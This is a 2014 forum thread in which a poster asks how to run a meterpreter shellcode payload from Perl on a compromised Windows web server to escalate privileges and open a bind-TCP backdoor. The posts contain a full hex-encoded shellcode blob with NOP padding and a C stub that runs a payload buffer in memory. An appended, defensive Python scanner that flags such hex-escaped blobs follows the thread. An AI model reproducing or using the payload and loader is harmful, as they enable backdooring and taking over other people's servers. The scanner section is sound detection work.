Author Topic: [Perl] Running meterpreter payload directly from Perl script


Offline sopinha

  • NULL
  • Posts: 2
  • Cookies: 0
[Perl] Running meterpreter payload directly from Perl script
« on: March 09, 2014, 01:54:44 am »
I was wondering if it was possible to run a payload directly from the execution of a Perl script on a compromised machine (with Perl installed).

Having the following code, how do I run the contents of $shellcode from the script?

Code:
my $junk = "\x90" x 504;

my $shellcode="\x90" x 50;

$shellcode=$shellcode.
"\xba\xce\xb2\xa4\x42\xdd\xc0\xd9\x74\x24\xf4\x5e\x31\xc9" .
"\xb1\x4a\x31\x56\x15\x83\xc6\x04\x03\x56\x11\xe2\x3b\x4e" .
"\x4c\xc4\xc3\xaf\x8d\xa9\x4a\x4a\xbc\xfb\x28\x1e\xed\xcb" .
"\x3b\x72\x1e\xa7\x69\x67\x95\xc5\xa5\x88\x1e\x63\x93\xa7" .
"\x9f\x45\x1b\x6b\x63\xc7\xe7\x76\xb0\x27\xd6\xb8\xc5\x26" .
"\x1f\xa4\x26\x7a\xc8\xa2\x95\x6b\x7d\xf6\x25\x07\xcd\xe7" .
"\x2d\xf4\x87\x06\x1f\xab\x9c\x50\xbf\x4d\x71\xe9\xf6\x55" .
"\x96\xd2\x41\xed\x6c\xa0\x53\x27\xbd\x49\x62\x07\x11\x74" .
"\x4a\x8a\x68\xb0\x6d\x75\x1f\xca\x8d\x08\x27\x09\xef\xd6" .
"\xa2\x8c\x57\x9c\x14\x75\x69\x71\xc2\xfe\x65\x3e\x81\x59" .
"\x6a\xc1\x46\xd2\x96\x4a\x69\x35\x1f\x08\x4d\x91\x7b\xca" .
"\xec\x80\x21\xbd\x11\xd2\x8e\x62\xb7\x98\x3d\x76\xce\xc2" .
"\x29\xbb\xe2\xfc\xa9\xd3\x75\x8e\x9b\x7c\x2d\x18\x90\xf5" .
"\xeb\xdf\xd7\x2f\x4b\x4f\x26\xd0\xab\x59\xed\x84\xfb\xf1" .
"\xc4\xa4\x90\x01\xe8\x70\x36\x52\x46\x2b\xf6\x02\x26\x9b" .
"\x9e\x48\xa9\xc4\xbe\x72\x63\x6d\x0f\x56\xdf\xfa\x6d\x68" .
"\xf1\xa6\xf8\x8e\x9b\x46\xac\x19\x34\xa5\x8b\x91\xa3\xd6" .
"\xfe\x8d\x7c\x41\xb7\xdb\xbb\x6e\x48\xce\xef\xc3\xe1\x99" .
"\x7b\x08\x36\xbb\x7b\x05\x1f\xac\xec\xd3\xf1\x9f\x8d\xe4" .
"\xd8\x4a\x4e\x71\xe6\xdc\x19\xed\xe4\x39\x6d\xb2\x17\x6c" .
"\xe5\x7b\x8d\xcf\x92\x83\x41\xd0\x62\xd2\x0b\xd0\x0a\x82" .
"\x6f\x83\x2f\xcd\xba\xb7\xe3\x58\x44\xee\x50\xca\x2c\x0c" .
"\x8e\x3c\xf3\xef\xe5\xbc\xc8\x39\xc0\x3a\x38\x4c\x20\x87";

Offline sopinha

  • NULL
  • Posts: 2
  • Cookies: 0
Re: [Perl] Running meterpreter payload directly from Perl script
« Reply #1 on: March 09, 2014, 07:08:51 am »
Let's say I am pentesting a Windows webserver and somehow get a PHP shell. Now, the owner of the Apache server is not System, so I want to elevate privileges somehow. I try to run a binary file in the target machine, containing a meterpreter payload, which I compiled from the C code:

Code:
// Our Meterpreter code goes here
unsigned char payload[]="<shellcode>";

// Push Meterpreter into memory
int main(void) { ((void (*)())payload)();}

Where <shellcode> refers to the code obtained from msfvenom to initiate a meterpreter bind TCP handler on the target machine, which will listen for incoming connections.
But as I try to run this binary file, I notice that I don't have enough privileges to run it, and there is no folder on the server from which I can run it. So then I notice the server has Perl installed and I wonder: if I run a script in Perl which behaves the same way as the compiled C code I tried to execute, would it be possible to create the backdoor directly from the script?
So my main question here is: is there any way to emulate the cast (void (*)()) in Perl to push the payload into memory?
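From the defender's side, the two artifacts these posts describe (a long chain of `\xNN` string literals joined with Perl's `.` operator, and a `"\x90" x N` padding or NOP sled) are exactly what a file scanner for dropped scripts should flag. The scanner below is an added example, not code from the original thread; the Perl sample it scans is constructed and contains no real payload bytes.

```python
"""Flag script files that embed long hex-escaped byte blobs or large
"\\xNN" x COUNT repetitions, the Perl shellcode-staging pattern above.
Added example; the SAMPLE script is constructed, not a real payload."""
import re

# Several "\xNN..." literals joined with Perl's '.' concatenation (whitespace/newlines allowed).
HEX_CHAIN = re.compile(r'"(?:\\x[0-9a-fA-F]{2})+"(?:\s*\.\s*"(?:\\x[0-9a-fA-F]{2})+")*')
# Perl's repetition idiom, e.g. "\x90" x 504, used for padding or a NOP sled.
REPEAT = re.compile(r'"\\x([0-9a-fA-F]{2})"\s*x\s*(\d+)')


def decode_chain(chain: str) -> bytes:
    """Turn a matched chain of \\xNN literals into the bytes it would produce."""
    return bytes(int(h, 16) for h in re.findall(r'\\x([0-9a-fA-F]{2})', chain))


def scan_script(text: str, min_bytes: int = 64) -> list:
    """Return sorted findings (line, kind, detail):
    'hex_blob' -> decoded byte count of a \\xNN chain at or above min_bytes
    'repeat'   -> ('NN', COUNT) for a "\\xNN" x COUNT with COUNT >= min_bytes
    """
    findings = []
    for m in HEX_CHAIN.finditer(text):
        blob = decode_chain(m.group(0))
        if len(blob) >= min_bytes:
            line = text.count("\n", 0, m.start()) + 1
            findings.append((line, "hex_blob", len(blob)))
    for m in REPEAT.finditer(text):
        count = int(m.group(2))
        if count >= min_bytes:
            line = text.count("\n", 0, m.start()) + 1
            findings.append((line, "repeat", (m.group(1).lower(), count)))
    return sorted(findings)


# Constructed Perl sample: 84 bytes of arbitrary \xNN escapes plus the x-repetition idiom.
SAMPLE = 'my $junk = "\\x90" x 504;\nmy $shellcode = "\\x90" x 50;\n$shellcode = $shellcode .\n' + \
    ' .\n'.join('"' + ''.join('\\x%02x' % ((i * 7 + j) % 256) for j in range(14)) + '"'
                for i in range(6)) + ';\nprint "hello\\x0a";\n'

if __name__ == "__main__":
    for line, kind, detail in scan_script(SAMPLE):
        print(f"line {line}: {kind} {detail}")
```

A benign `print "hello\x0a"` is not reported, because only literals made entirely of escapes, or repetitions at or above the threshold, count.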